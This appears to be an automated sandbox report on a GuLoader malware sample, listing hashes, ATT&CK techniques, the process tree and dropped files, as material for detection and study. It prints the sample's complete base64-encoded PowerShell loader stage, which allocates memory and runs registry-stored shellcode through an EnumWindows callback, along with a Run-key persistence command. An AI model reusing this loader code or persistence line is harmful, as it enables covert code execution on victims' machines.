guloader | 7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9

General

Target

JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
Size

344KB
MD5

26c1961c629a942788089f89b1cac50c
SHA1

935559fe62e2178e4efc45a31ab1d11488d8412c
SHA256

7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9
SHA512

5ca13c271e755ff13a6926a20773af65c4aa755a92f4a4e3891558675acd0738b2fcdf1873bd1545a21ebcae771275ec35ff36c866b0cd9be8970a7f11a415ce
SSDEEP

1536:N64IoY2vqki1BN/cjGRhMR+ebjz9IjRmvog6nCaysWYp2IazMRAt6DziIwNFczqt:KoRyk1SXCXz99vog6jysuMRkmiIY+y

Score

10^/10

guloader defense_evasion discovery downloader persistence

Malware Config

Signatures

Guloader family
guloader
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Perchl67 = "%Ostun% -w 1 $Indl=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Labbeuvu;%Ostun% -encodedcommand($Indl)"	ieinstal.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2060	powershell.exe
2944	ieinstal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2060 set thread context of 2944	2060	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ieinstal.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2060	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2060	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 2060	2168	WScript.exe	30
PID 2168 wrote to memory of 2060	2168	WScript.exe	30
PID 2168 wrote to memory of 2060	2168	WScript.exe	30
PID 2168 wrote to memory of 2060	2168	WScript.exe	30
PID 2060 wrote to memory of 3004	2060	powershell.exe	32
PID 2060 wrote to memory of 3004	2060	powershell.exe	32
PID 2060 wrote to memory of 3004	2060	powershell.exe	32
PID 2060 wrote to memory of 3004	2060	powershell.exe	32
PID 3004 wrote to memory of 2284	3004	csc.exe	33
PID 3004 wrote to memory of 2284	3004	csc.exe	33
PID 3004 wrote to memory of 2284	3004	csc.exe	33
PID 3004 wrote to memory of 2284	3004	csc.exe	33
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34
PID 2060 wrote to memory of 2944	2060	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AZABpACAAVABlAHQAcgBhACAAUABlAHIAcgBhAGQAIABOAGQAdgBlACAAQQB0AHQAcgB1AHAAcwAgAEUAZgB0AGUAcgBnAGkAIABCAGUAZwB5AG4AIABQAHUAcgBsAGkAIABCAGEAcwBpACAATABhAHYAdgAgAEgAZQBhAGQAbABpACAASQBzAGIAbgAgAGEAZgBhAHIAdABlAHIAbgBlACAAVABpAGwAYgBhAGcAZQBkAGEAdAAgAEgAaQBnAGgAbAB5AHIAIABVAG4AbABvAHYAZQBsAGkAZQAgAEcAZABzAGsAIABVAGQAcwBpAGcAIABTAHAAaQBuAGMAbwB2AGEAIABTAGEAbgBrAGUAawBvACAARgB1AG4AZAAgAGQAZQBuAG8AdABhAHQAaQAgAFMAaQBuAHMAbwBwAHMAZwAgAFoAeQBnAG8AcwAgAEUAbQBwAHkAcgBlAHUAIABUAG8AYQBzAHQAZQBkACAATgBvAG4AZQBuACAAWABlAHIAbwBnAHIAYQBwAGgAIABMAGEAdABpAGcAIAANAAoAIwBQAGEAcgB0AHIAaQAgAE0AdQB0AGEAcgBvAHQAYQB0ACAAVAByAGEAbABsACAAUwBlAG0AaQBoAGkAcwB0ACAAWgB5AGcAbwBtAHkAYwBlACAAVABpAGcAZQByAGUAbgAgAEMAZQBuAHQAcgAgAFMAdAB1AHQAIABWAGEAZwB0AHAAbwAgAEMAaABhAHIAbQBlACAASwB5AG4AZABlAGwAbQBpAHMAIABCAGUAdAByACAAbABhAHMAcwBpACAAUABoAGkAbABpACAAbABvAHYAbwB2AGUAcgB0AHIAIABNAG8AdQBpAGwAbABlAGIAcgAgAFQAdQBiAGEAdABlAGIAaQAgAEEAZgB2AG4AbgBlAGQAZQAgAFQAdwBpAGwAaQAgAEEAbABjAGEAaQAgAEwAdABuAGkAbgBnAHAAdQBsACAATQB1AGMAaQBuACAADQAKACMAUwBsAGIAZQByAG4AZQAgAGIAaQBsAGwAZQBkACAAVABlAGwAZQB2ACAAVgBlAHIAZABlAG4AcwAgAEMAbwBuAHMAZQBjAHIAIABBAHIAYgBlAGoAZABzAGYAbwAgAEYAZQByAGkAZQB1AGcAZQB1AGQAIABGAGwAYQBtAGIAIABCAHIAaQBsAGwAZQAgAEEAZAB6AGUAcgAgAFQAaABlAG8AcgBlAHQAaQAgAEUAbgBjAGgAYQBzAGUAIABzAGwAYQBuAGcAIABCAG8AcgB0AGYAIAANAAoAJABNAGEAcwB0AGUAcgBNAGkAbgBkACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAE4AIgAgACsAIAAiAHQAQQBsACIAIAArACAAIgBsAG8AYwAiACAAKwAgACIAYQB0AGUAIgArACIAVgBpACIAIAArACAAIgByAHQAdQBhAGwAIgAgACsAIAAiAE0AZQBtAG8AcgB5ACIAIAArACAAWwBjAGgAYQByAF0AMwA0AA0ACgANAAoAIwBGAGkAbgB0AG0AYQBzAGsAIABSAG8AawBrAGUAZABlACAAQwBvAG4AcwBpACAAUwB1AGIAZABlAGYAaQAgAE4AZQBwAG8AdABpAHMAdAAgAFAAdQBwAGkAbAAgAEYAZQBzAHQAbABpAGcAaABvAGwAIABGAG8AcgBzAHQAeQByACAAUAByAG8AZAB1AGsAdABhAG4AcwAgAE4AZQBwAGgAcgBhAGQAZQAgAFIAaQBiAGIAbwBuAGYAIABJAG4AdgBpAG8AbABhAHQAZQBkACAAUAB1AGQAZQBuAHQAdABlACAATQBlAGwAYQBuAGMAaABvACAAUAByAG8AZQBwAGkAbQBlAHIAbwAgAFMAawBpAGYAdAAgAE0AZQByAGsAYQBuAHQAaQBsAGkAIABCAGUAZwB5AG4AZABlAGwAcwBlACAAQwBlAHIAdQBsAGUAIABTAG8AbQBhACAASwBlAGcAbABlAHIAcwBmAHIAZQAgAFQAYQBuAGQAZwBsAGEAcwAgAE8AdQB0AHAAYQBjAGUAcwBjAHIAIABBAGEAYgBuAGkAbgBnACAAVgBhAG4AZwBsACAADQAKACMARAB5AHMAdABvAG0AbwB1AHMAeQAgAEUAaQByAGUAIABDAGEAcABsAGkAbgBjACAAUwBtAHIAcgAgAFMAYwBoAGEAYwBoAHQAcwBjACAAQwBvAGwAbwBzAHQAcgB1ACAATgBzAGUAdgByAGQAaQBnAGUAbgAgAFMAZQBtAGkAaABpACAATgBpAHQAcgAgAE0AbwBpAHIAZQBzAG0AYQBhAHAAIABBAHQAZQBsAGkAZQByACAAUwBrAG8AawBrACAAUABhAHIAdABpAGMAIABOAG8AbgBhAGMAIABSAGEAbQBpACAARAB1AGMAaABlAHMAcwBlACAADQAKACMARgBpAG4AZwBlAHIAcwBwAGkAZAAgAEEAdgBsAHMAaABpAG4AIABJAG4AYwBpAHYAIABQAHIAZQBkAGUAIABTAHQAYQB0AGkAbwAgAHIAZQB2AGkAbgBkACAASwBhAGkAbAB5AGEAcgBkAGUAcgAgAEUAbABlAGEAegBhAHIAYgAgAFAAcgBvAHAAaQB0ACAAQgBhAHMAaABqACAASAB1AGwAcwBrAGUAZQAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAVQBuAGUAdQBwAGgAbwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFMAbABlAGUAcABFAHgAKABpAG4AdAAgAEIAcgBhAGQAeQBzAHAAMAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABHAGUAdABXAGkAbgBkAG8AdwBEAEMAKAApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACQATQBhAHMAdABlAHIATQBpAG4AZAApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABWAGkAdAByAG8AUwBvAGwAaQBkACgAaQBuAHQAIABVAG4AZQB1AHAAaABvADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEIAaQBsAGwAZQByADIAMQA0ACwAaQBuAHQAIABTAHQAcgBhAG4AZABmACwAcgBlAGYAIABJAG4AdAAzADIAIABVAG4AZQB1AHAAaABvACwAaQBuAHQAIABPAHYAZQByAHAAYQBpAG4AdAByACwAaQBuAHQAIABVAG4AZQB1AHAAaABvADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBEADIAcwB0AGEAbQBwACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABQAG8AbwBsAFMAdABhAGMAawAoACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIARQBuAHUAbQBXAGkAbgBkAG8AdwBzACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATQBvAHIAcQBxACgAdQBpAG4AdAAgAFMAdAByAGEAbgBkAGYANQAsAGkAbgB0ACAAUwB0AHIAYQBuAGQAZgA2ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABTAHQAcgBhAG4AZABmADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAFMAdAByAGEAbgBkAGYAMgAsAGkAbgB0ACAAUwB0AHIAYQBuAGQAZgAzACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBTAGUAbQBhAG4AdABpACAAUAByAGUAcwBsAGkAYwAgAFIAYQBuAHUAbABhAHMAdABvACAAUwBvAGkAcgBlAGUAIABVAG4AZABkAHIAYQBnAGUAIABGAHUAcwBzAHAAIABQAGwAZQBpACAAUwB0AGUAcgBuACAAUwBjAG8AdABjAGgAdwAgAFMAYQBjAGMAaABhAHIAbwBjACAARgBvAGQAZgBzACAAUwBwAGEAbgBpAGUAbAB3ACAARABlAG0AbwAgAEgAeQBwAG8AZgAgAFMAaQBhAGwAbwBhAG4AIABTAHQAbwByAG0AZgBhAGwAZAAgAEYAcgBnAGUAIABJAG4AZABlAGsAbABpAG0AIABUAGoAZQBuACAAQwBoAGEAcgBtACAARQBzAHAAaQBlAHIAbgAgAFMAcABhAHQAaQBuAGcAcwAgAFQAaQBnAGgAIABwAG8AbAB5AGkAbQBpAGQAZQBwACAASwB1AGUAbABzAGUAcAByACAARQByAGkAbgBkACAAUwB3AGUAbABsACAAVABpAGwAZQAgACAADQAKACQAVQBuAGUAdQBwAGgAbwAzAD0AMAA7AA0ACgAjAFIAZQBlAG0AaQBnAHIAIABUAGEAeQByACAARQB2AGEAbgBnAGUAbABpACAATQBlAGMAawBlAGwAaQBhAG4AIAB0AGUAbQBwAGUAbAAgAEQAaQBzAGEAcgByAGEAeQBzACAAUwB0AHIAYQBhAGwAaQBuAGcAIABCAGEAcgBvAHMAbQBhAHAAIABFAG0AZQByAGcAZQByAHMAIABQAG8AcwBlAHQAYgBhAHMAIABQAHIAZQB0AHIAaQAgAEEAYQBsAGEAbgBkAHMAawBtAGEAIABPAHYAZQByAHQAYQBsACAADQAKACQAVQBuAGUAdQBwAGgAbwA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAjAE4AbwByAGQAbQBuAGQAIABGAGkAbABrAGEAbABkACAAUwBlAHQAdABlAHIAIABQAHIAbwBwAG8AcwBpAHQAaQAgAFIAZQBuAHMAawAgAFAAcgBlAHAAIABNAGEAbgBkAGEAbABhAHkAIABBAG4AawByAGkAbgBnAHMAYQBmACAAUwBhAGwAdABpAGcAcgBhACAAUwBqAGkAcABwAGUAcwBvACAAaABvAHIAbgBpAGUAcgAgAEgAeQBnAHIAbwAgAEQAaQBuAGUAcgBzACAAVAByAG4AZQBuACAAVAByAGUAbQBhAG4AIABHAGEAbQBsAGkAbgBnAGIAbgAgAA0ACgAkAFUAbgBlAHUAcABoAG8AOAA9AFsAVQBuAGUAdQBwAGgAbwAxAF0AOgA6AFYAaQB0AHIAbwBTAG8AbABpAGQAKAAtADEALABbAHIAZQBmAF0AJABVAG4AZQB1AHAAaABvADMALAAwACwAWwByAGUAZgBdACQAVQBuAGUAdQBwAGgAbwA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMAVQBuAGUAbgB2AGkAcgBvACAASQBuAGQAbABlAHYAZQByAGUAIABFAGYAdABlACAATwBwAGEAYwBvAHUAcwBuACAARQB2AGUAbgAgAEMAaABhAHIAZwBlAHIAZQAgAFMAYQB0AHMAIABSAGUAZgBsACAAUABhAG0AbwByAHQAaABvAHAAZQAgAHUAYgBlAGsAdgBlAG0AbQAgAEQAaQBjAHQAYQBtACAAVABlAGwAZQBnAHIAIABIAGkAcABiAGUAcgAgAA0ACgAkAEIAZQBnAHIAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEQAZQBmAG8AcwBzACIAKQAuAFMAYQBuAGMAeQBwAGUAcwB0AGkADQAKACMAQgB1AG4AZAByAGUAawBvACAAUgBlAGsAdABpAGYAIABVAG4AYwBvAG0AcABhAHQAaQAgAEgAYQBlAHYAZABvAHYAZQAgAE8AZQB1AHYAcgAgAFAAaABvAHQAbwAgAFMAYQBsAHQAYwBoAHUAYwBrAGUAIABCAG8AcgBnAGgAZQByAHIAZQBuACAAUwBpAGsAcgBpAG4AZwBzAHMAIABEAHUAbgBjAGgAZgBsAGkAcwAgAEEAbgBpAG0AaQB6AGUAZAAgAEwAaQBuAGkAbgBnAHQAcgBpACAAQgBoAGEAdgBhAG4AYQBkACAARgBhAHYAbwByAGkAIABBAHAAbwB0AHkAcABpAGMAcAAgAFMAdgBhAGwAaQBuACAASwB2AGEAbgAgAEMAeQBwAHIAaQAgAEYAbABsAGUAZABlACAASQBtAHAAZQAgAFMAdAB1AGQAaQBlAGsAbwAgAEQAbwBzAG0AZQByAGUAbgBwAGEAIABUAGEAbABsACAATABlAHYAbgBlAGQAIABVAG4AZABlAHIAaABhAGEAbgBkACAAUwB0AGUAbABsAGUAbgBkAGUAIABDAGwAdQBtAHMAaQBuACAAUgBlAGgAYQBiACAAQwBvAGwAbAAgAFMAeQBzAHQAZQBtAGYAIABJAGQAZQBhAGkAcwB0AGkAYwAgAEkAbQBwAHUAdABhAGIAbAAgAEcAcgBhAHYAaQB0AGEAdAAgAA0ACgAkAEIAZQBkAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAF0ALAAkAEIAZQBnAHIALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkADQAKACMAVABhAGwAZQBwAGQAYQBnAG8AIABSAHUAcwBrAHIAZQBnAG4AZQBuACAATwB2AGUAcgBsAGUAdwAgAFMAawBpAGYAIABJAG4AaQBxAHUAaQB0AGkAZQAgAHIAbwBhAGQAdwAgAHUAZABzAGwAdQAgAEIAZQB0AHIAawAgAFQAbwByAG4AZQBzAHQAcgAgAEwAdQBtAGIAYQByAHMAIABQAGEAcgBvAG4AIABUAG8AcgB2AGUAaABhAG4AZABlACAAVQBkAG0AYQB0AHIAaQAgAFMAaQBkAGEAbABjACAATQBlAHIAYwBlACAADQAKAEYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAEIAZQBnAHIALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAQgBlAGQAcgBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAEIAZQBnAHIALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQANAAoAIAAgACAAIAB9AA0ACgANAAoADQAKAGYAbwByACgAJABTAHQAZQByAGUAbwAxADIANQA9ADAAOwAgACQAUwB0AGUAcgBlAG8AMQAyADUAIAAtAGwAdAAgACQAQgBlAGQAcgAuAGMAbwB1AG4AdAAgADsAIAAkAFMAdABlAHIAZQBvADEAMgA1ACsAKwApAA0ACgB7AA0ACgAJAA0ACgBbAFUAbgBlAHUAcABoAG8AMQBdADoAOgBSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgAJABVAG4AZQB1AHAAaABvADMAKwAkAFMAdABlAHIAZQBvADEAMgA1ACwAWwByAGUAZgBdACQAQgBlAGQAcgBbACQAUwB0AGUAcgBlAG8AMQAyADUAXQAsADEAKQANAAoADQAKAH0ADQAKAFsAVQBuAGUAdQBwAGgAbwAxAF0AOgA6AE0AbwByAHEAcQAoACQAVQBuAGUAdQBwAGgAbwAzACwAIAAwACkADQAKAA0ACgANAAoA"
  2⤵
  - Checks QEMU agent file
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2060
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3004
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EC9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8EC8.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2284
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    - Checks QEMU agent file
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.dll

Filesize
3KB

MD5
86eeccd412b0611b904e6b7cee9a9ebc

SHA1
8906b31330b2c60dedbefe3c581f49b1bb7dfade

SHA256
2154de0277d00d2a9ed605feabe40e25bcfc5f10f365ea01b05448c0d48ce79e

SHA512
5c2e597bbb2b8f3c3f72f775d9a17add8e335655b1635175a8c39f37169f3dbf873a4a869b1c5d5f6df9a5d96f5aa59a225d8622881478ba0fb163b7ac739ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\9dxjs_-h.pdb

Filesize
7KB

MD5
ddc7f6cd16d069cb9562d267e9db9296

SHA1
51a147d5f97ae7efad3660bc920203a49f4b1726

SHA256
bb14e8ccfeb8bfa91861653cac440d27a48e1f585fe2bcf16771752b38eb6c4a

SHA512
8c2053a245916eaac60e901f530e2a317a5892a319f8e608f62e1352bddb84de446a1ba57d1b65009079c6b81e3350b7e79ded7e41e1c6ddabbe2220868284f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8EC9.tmp

Filesize
1KB

MD5
4045d2cd8c556267c4f3b2f1c0eccd4d

SHA1
1baebacbc370aa7c086b37d937f5c5848589798e

SHA256
0fc3801ccb8fe168332ea2e87471c6fa50a08e3021fb119796688a72462241ff

SHA512
b6d739211edae0b7d4b1887f6dc4b14e2ef5e29d8eb0abf7ec5e50793da916ae77f773761d0387d1a3815718dae172d7bb10ac0455cd476eb2b78db978457f7d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\9dxjs_-h.0.cs

Filesize
706B

MD5
2f2d59ad9746f83211ab41b81f4ffb53

SHA1
3266d96213f29e9d3b556b124df0f617e30e6037

SHA256
841ca0fdae8cb9d8d1c70b96dd57ba4fd2c6df399be995b63028a9e9b218d1b9

SHA512
e5baea9a9115a2cd410894f140099b5c6a2acf494c1f5b6ee773ea2513b067039f4f7dffdb83ca60e7793fbb2be23b29fab1c4a5ca72844d75a77b02696ccde2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\9dxjs_-h.cmdline

Filesize
309B

MD5
5e16c1a5844bec09ea7735c386f4a0d0

SHA1
d5ebbc2e052d13a2911f8bfa60eaf74a2296647b

SHA256
505f7fd13c801923e1eb5e7e6f8d6f10745a148adfcd8a352d3316679e73bd26

SHA512
4647cfcdc13eba116313606cf4b64ee0e87cbc2fe24d52b2c2bda5847db055f7c3a579ddca2f7bc0b9f69074f008395e6fef5890fd311798bfdeecd668991603

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8EC8.tmp

Filesize
652B

MD5
9526e488ee9c2226419fe16b57b5f091

SHA1
a7a982b25a0bdaeda8258894ef2db7d24442900d

SHA256
79326bee850955621515eb9f5a470ac7204ef53127a209b804b1fddd3d5f8dbb

SHA512
e8a9db9980cc704a9b1cd2f325ec096ef80e97bd6a280ef5d517081e22873b545d6b5232c5a5913a514439e359e1c5d63b9afc1cfe2d2c0c44ef5e6bd5dd0c2e

Download Submit
memory/2060-6-0x0000000073F10000-0x00000000744BB000-memory.dmp

Filesize
5.7MB

Download
memory/2060-2-0x0000000073F11000-0x0000000073F12000-memory.dmp

Filesize
4KB

Download
memory/2060-5-0x0000000073F10000-0x00000000744BB000-memory.dmp

Filesize
5.7MB

Download
memory/2060-4-0x0000000073F10000-0x00000000744BB000-memory.dmp

Filesize
5.7MB

Download
memory/2060-3-0x0000000073F10000-0x00000000744BB000-memory.dmp

Filesize
5.7MB

Download
memory/2060-22-0x0000000073F10000-0x00000000744BB000-memory.dmp

Filesize
5.7MB

Download
memory/2944-23-0x0000000000150000-0x0000000000250000-memory.dmp

Filesize
1024KB

Download
memory/2944-38-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads